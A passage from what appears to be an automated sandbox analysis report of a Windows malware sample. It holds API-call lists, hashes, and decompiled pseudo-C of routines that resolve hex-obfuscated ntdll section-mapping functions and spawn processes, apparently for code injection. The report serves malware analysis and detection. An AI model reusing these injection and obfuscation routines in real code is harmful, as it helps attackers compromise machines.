                                                          • RtlEnterCriticalSection.NTDLL(052E9570), ref: 047F2091
                                                          • RtlLeaveCriticalSection.NTDLL(052E9570), ref: 047F20AF
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?,052E95B0), ref: 047F1BE1
                                                            • Part of subcall function 047F1BB6: lstrlen.KERNEL32(?,?,?,047F20C2,?,052E95B0), ref: 047F1BE9
                                                            • Part of subcall function 047F1BB6: strcpy.NTDLL ref: 047F1C00
                                                            • Part of subcall function 047F1BB6: lstrcat.KERNEL32(00000000,?), ref: 047F1C0B
                                                            • Part of subcall function 047F1BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F1C28
                                                          • StrTrimA.SHLWAPI(00000000,047FC28C,?,052E95B0), ref: 047F20E1
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(052E9A78,00000000,00000000,7742C740,047F20ED,00000000), ref: 047F362A
                                                            • Part of subcall function 047F361A: lstrlen.KERNEL32(?), ref: 047F3632
                                                            • Part of subcall function 047F361A: lstrcpy.KERNEL32(00000000,052E9A78), ref: 047F3646
                                                            • Part of subcall function 047F361A: lstrcat.KERNEL32(00000000,?), ref: 047F3651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 047F2100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047F2107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 047F2114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047F2118
                                                            • Part of subcall function 047F6777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 047F6829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047F2148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 047F2157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,052E95B0), ref: 047F2166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F2178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 047F2187
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 981eb26b036c7d2e137a6e0378dd1e64a08acfcf3634b434958556dcc4f5ab29
                                                          • Instruction ID: 889f6f01911e19e5eb6bde03d2cc6c7ef30c15085a0b60cc3ceae44ebf179c6a
                                                          • Opcode Fuzzy Hash: 981eb26b036c7d2e137a6e0378dd1e64a08acfcf3634b434958556dcc4f5ab29
                                                          • Instruction Fuzzy Hash: 5F617171500204AFE722ABA4ED48F9A77E9FB48354F048914FA06D7361EB3DEC06DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 51%
                                                          			E047FAC55(long _a4, long _a8) {
                                                          				signed int _v8;
                                                          				intOrPtr _v16;
                                                          				LONG* _v28;
                                                          				long _v40;
                                                          				long _v44;
                                                          				long _v48;
                                                          				CHAR* _v52;
                                                          				long _v56;
                                                          				CHAR* _v60;
                                                          				long _v64;
                                                          				signed int* _v68;
                                                          				char _v72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t81;
                                                          				intOrPtr* _t82;
                                                          				intOrPtr* _t83;
                                                          				intOrPtr* _t85;
                                                          				intOrPtr* _t90;
                                                          				intOrPtr* _t95;
                                                          				intOrPtr* _t98;
                                                          				void* _t102;
                                                          				intOrPtr* _t104;
                                                          				void* _t115;
                                                          				long _t116;
                                                          				void _t125;
                                                          				void* _t131;
                                                          				signed short _t133;
                                                          				struct HINSTANCE__* _t138;
                                                          				signed int* _t139;
                                                          
                                                          				_t139 = _a4;
                                                          				_v28 = _t139[2] + 0x47f0000;
                                                          				_t115 = _t139[3] + 0x47f0000;
                                                          				_t131 = _t139[4] + 0x47f0000;
                                                          				_v8 = _t139[7];
                                                          				_v60 = _t139[1] + 0x47f0000;
                                                          				_v16 = _t139[5] + 0x47f0000;
                                                          				_v64 = _a8;
                                                          				_v72 = 0x24;
                                                          				_v68 = _t139;
                                                          				_v56 = 0;
                                                          				asm("stosd");
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				if(( *_t139 & 0x00000001) == 0) {
                                                          					_a8 =  &_v72;
                                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                          					return 0;
                                                          				}
                                                          				_t138 =  *_v28;
                                                          				_t76 = _a8 - _t115 >> 2 << 2;
                                                          				_t133 =  *(_t131 + _t76);
                                                          				_a4 = _t76;
                                                          				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                          				_v56 = _t80;
                                                          				_t81 = _t133 + 0x47f0002;
                                                          				if(_t80 == 0) {
                                                          					_t81 = _t133 & 0x0000ffff;
                                                          				}
                                                          				_v52 = _t81;
                                                          				_t82 =  *0x47fd1a0; // 0x0
                                                          				_t116 = 0;
                                                          				if(_t82 == 0) {
                                                          					L6:
                                                          					if(_t138 != 0) {
                                                          						L18:
                                                          						_t83 =  *0x47fd1a0; // 0x0
                                                          						_v48 = _t138;
                                                          						if(_t83 != 0) {
                                                          							_t116 =  *_t83(2,  &_v72);
                                                          						}
                                                          						if(_t116 != 0) {
                                                          							L32:
                                                          							 *_a8 = _t116;
                                                          							L33:
                                                          							_t85 =  *0x47fd1a0; // 0x0
                                                          							if(_t85 != 0) {
                                                          								_v40 = _v40 & 0x00000000;
                                                          								_v48 = _t138;
                                                          								_v44 = _t116;
                                                          								 *_t85(5,  &_v72);
                                                          							}
                                                          							return _t116;
                                                          						} else {
                                                          							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                          								L27:
                                                          								_t116 = GetProcAddress(_t138, _v52);
                                                          								if(_t116 == 0) {
                                                          									_v40 = GetLastError();
                                                          									_t90 =  *0x47fd19c; // 0x0
                                                          									if(_t90 != 0) {
                                                          										_t116 =  *_t90(4,  &_v72);
                                                          									}
                                                          									if(_t116 == 0) {
                                                          										_a4 =  &_v72;
                                                          										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                          										_t116 = _v44;
                                                          									}
                                                          								}
                                                          								goto L32;
                                                          							} else {
                                                          								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                          								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                          									_t116 =  *(_a4 + _v16);
                                                          									if(_t116 != 0) {
                                                          										goto L32;
                                                          									}
                                                          								}
                                                          								goto L27;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t98 =  *0x47fd1a0; // 0x0
                                                          					if(_t98 == 0) {
                                                          						L9:
                                                          						_t138 = LoadLibraryA(_v60);
                                                          						if(_t138 != 0) {
                                                          							L13:
                                                          							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                          								FreeLibrary(_t138);
                                                          							} else {
                                                          								if(_t139[6] != 0) {
                                                          									_t102 = LocalAlloc(0x40, 8);
                                                          									if(_t102 != 0) {
                                                          										 *(_t102 + 4) = _t139;
                                                          										_t125 =  *0x47fd198; // 0x0
                                                          										 *_t102 = _t125;
                                                          										 *0x47fd198 = _t102;
                                                          									}
                                                          								}
                                                          							}
                                                          							goto L18;
                                                          						}
                                                          						_v40 = GetLastError();
                                                          						_t104 =  *0x47fd19c; // 0x0
                                                          						if(_t104 == 0) {
                                                          							L12:
                                                          							_a8 =  &_v72;
                                                          							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                          							return _v44;
                                                          						}
                                                          						_t138 =  *_t104(3,  &_v72);
                                                          						if(_t138 != 0) {
                                                          							goto L13;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					_t138 =  *_t98(1,  &_v72);
                                                          					if(_t138 != 0) {
                                                          						goto L13;
                                                          					}
                                                          					goto L9;
                                                          				}
                                                          				_t116 =  *_t82(0,  &_v72);
                                                          				if(_t116 != 0) {
                                                          					goto L33;
                                                          				}
                                                          				goto L6;
                                                          			}


































                                                          APIs
                                                          • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 047FACCE
                                                          • LoadLibraryA.KERNEL32(?), ref: 047FAD4B
                                                          • GetLastError.KERNEL32 ref: 047FAD57
                                                          • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 047FAD8A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                          • String ID: $
                                                          • API String ID: 948315288-3993045852
                                                          • Opcode ID: 823d6b5346c2f84ba5b090cbd99b136b6a6e1673b679cfc6a5f0beef78ffdda8
                                                          • Instruction ID: 0772ff8a6c6d50b3c2bdde22b40c53b27d3b9924711bff6a08d11a88988ba967
                                                          • Opcode Fuzzy Hash: 823d6b5346c2f84ba5b090cbd99b136b6a6e1673b679cfc6a5f0beef78ffdda8
                                                          • Instruction Fuzzy Hash: BF810875A00209AFDB21CFA9DC85AAEB7F5FF48311F158429EA09E7340E7B4E945CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E047F6C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x47fd33c; // 0x52e9798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E047FA557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x47fc18c;
                                                          				}
                                                          				_t46 = E047F18A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E047FA71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t16 = _t75 + 0x47feb08; // 0x530025
                                                          						 *0x47fd118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E047FA557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x47fc190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E047FA71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E047FA734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x47fd2a8; // 0xaea5a8
                                                          							_t31 = _t66 + 0x47fec28; // 0x73006d
                                                          							 *0x47fd118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E047FA734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}


                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 047F6C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 047F6C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 047F6C96
                                                          • lstrlen.KERNEL32(00000000), ref: 047F6C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 047F6CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 047F6D0A
                                                          • lstrlen.KERNEL32(?), ref: 047F6D13
                                                          • lstrlen.KERNEL32(?), ref: 047F6D1A
                                                          • lstrlenW.KERNEL32(?), ref: 047F6D21
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$CountFreeHeapTick
                                                          • String ID:
                                                          • API String ID: 2535036572-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 73%
                                                          			E047F8EA1(void* __eax, void* __ecx) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				void* _v16;
                                                          				void* _v28;
                                                          				long _v32;
                                                          				void _v104;
                                                          				char _v108;
                                                          				long _t36;
                                                          				intOrPtr _t40;
                                                          				intOrPtr _t47;
                                                          				intOrPtr _t50;
                                                          				void* _t58;
                                                          				void* _t68;
                                                          				intOrPtr* _t70;
                                                          				intOrPtr* _t71;
                                                          
                                                          				_t1 = __eax + 0x14; // 0x74183966
                                                          				_t69 =  *_t1;
                                                          				_t36 = E047F592D(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                                                          				_v8 = _t36;
                                                          				if(_t36 != 0) {
                                                          					L12:
                                                          					return _v8;
                                                          				}
                                                          				E047FA749( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                                          				_t40 = _v12(_v12);
                                                          				_v8 = _t40;
                                                          				if(_t40 == 0 && ( *0x47fd260 & 0x00000001) != 0) {
                                                          					_v32 = 0;
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					asm("stosd");
                                                          					_v108 = 0;
                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t18 = _t47 + 0x47fe3e6; // 0x73797325
                                                          					_t68 = E047F3C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t19 = _t50 + 0x47fe747; // 0x52e8cef
                                                          						_t20 = _t50 + 0x47fe0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E047FA62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E047FA62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x47fd238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E047FA734(_t70);
                                                          				goto L12;
                                                          			}


                                                          APIs
                                                            • Part of subcall function 047F592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047F8EBD,?,00000001,?,?,00000000,00000000), ref: 047F5952
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 047F5974
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 047F598A
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047F59A0
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047F59B6
                                                            • Part of subcall function 047F592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047F59CC
                                                          • memset.NTDLL ref: 047F8F0B
                                                            • Part of subcall function 047F3C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,047F8F24,73797325), ref: 047F3C59
                                                            • Part of subcall function 047F3C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047F3C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,052E8CEF,73797325), ref: 047F8F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 047F8F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047F8FB0
                                                            • Part of subcall function 047FA62D: GetProcAddress.KERNEL32(36776F57,047FA2D4), ref: 047FA648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 047F8F8D
                                                          • CloseHandle.KERNEL32(?), ref: 047F8F92
                                                          • GetLastError.KERNEL32(00000001), ref: 047F8F96
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E047F1BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x47fd2a8; // 0xaea5a8
                                                          				_t1 = _t9 + 0x47fe62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E047F173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E047FA71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E047F64EF(_t34, _t41, _a8);
                                                          						E047FA734(_t41);
                                                          						_t42 = E047F6467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E047FA734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E047F17E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E047FA734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E047FA734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}


                                                          APIs
                                                            • Part of subcall function 047F173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,047F1BD0,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?), ref: 047F17A4
                                                            • Part of subcall function 047F173D: sprintf.NTDLL ref: 047F17C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,047F20C2,?,052E95B0), ref: 047F1BE1
                                                          • lstrlen.KERNEL32(?,?,?,047F20C2,?,052E95B0), ref: 047F1BE9
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • strcpy.NTDLL ref: 047F1C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 047F1C0B
                                                            • Part of subcall function 047F64EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,047F1C1A,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F6506
                                                            • Part of subcall function 047FA734: HeapFree.KERNEL32(00000000,00000000,047F5637,00000000,?,?,00000000), ref: 047FA740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047F20C2,?,052E95B0), ref: 047F1C28
                                                            • Part of subcall function 047F6467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,047F1C34,00000000,?,?,047F20C2,?,052E95B0), ref: 047F6471
                                                            • Part of subcall function 047F6467: _snprintf.NTDLL ref: 047F64CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 047F68EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 047F68FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 047F6911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F6979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F6988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 047F6993
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 25a258670f416944f072145bb1ed6ca301d5bdf53507e0b49cf9c940f98c58ff
                                                          • Instruction ID: eb386cb82df14add546f0a52281feebec8ea6034c3571a3bf8b1c1f209faa532
                                                          • Opcode Fuzzy Hash: 25a258670f416944f072145bb1ed6ca301d5bdf53507e0b49cf9c940f98c58ff
                                                          • Instruction Fuzzy Hash: E2414136910609AFDB01DFB8D844ADEB7BAEF49310F144429EE14EB360DA71ED06CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E047F592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E047FA71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t1 = _t23 + 0x47fe11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x47fd2a8; // 0xaea5a8
                                                          					_t2 = _t26 + 0x47fe769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E047FA734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x47fd2a8; // 0xaea5a8
                                                          						_t5 = _t30 + 0x47fe756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x47fd2a8; // 0xaea5a8
                                                          							_t7 = _t33 + 0x47fe40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x47fd2a8; // 0xaea5a8
                                                          								_t9 = _t36 + 0x47fe4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x47fd2a8; // 0xaea5a8
                                                          									_t11 = _t39 + 0x47fe779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E047F6604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 047FA71F: RtlAllocateHeap.NTDLL(00000000,00000000,047F5595), ref: 047FA72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047F8EBD,?,00000001,?,?,00000000,00000000), ref: 047F5952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 047F5974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 047F598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047F59A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047F59B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047F59CC
                                                            • Part of subcall function 047F6604: memset.NTDLL ref: 047F6683
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.487149969.00000000047F1000.00000020.00000001.sdmp, Offset: 047F0000, based on PE: true
                                                          • Associated: 00000002.00000002.487122558.00000000047F0000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487186321.00000000047FC000.00000002.00000001.sdmp
                                                          • Associated: 00000002.00000002.487214261.00000000047FD000.00000004.00000001.sdmp
                                                          • Associated: 00000002.00000002.487274365.00000000047FF000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: cab42165c60c823e2f3ea60c306fc39c5741960e3e43ed47ea77bf93487f9622
                                                          • Instruction ID: 58dd443cfc7e15335f3ba2a59a0fa7cd5669232789eeb7070e5f1b8bced2bca3
                                                          • Opcode Fuzzy Hash: cab42165c60c823e2f3ea60c306fc39c5741960e3e43ed47ea77bf93487f9622
                                                          • Instruction Fuzzy Hash: 812141B560070AFFD720EFA9CC88D9AB7ECEF043547018526E646C7321E778E9058B60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E047F853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
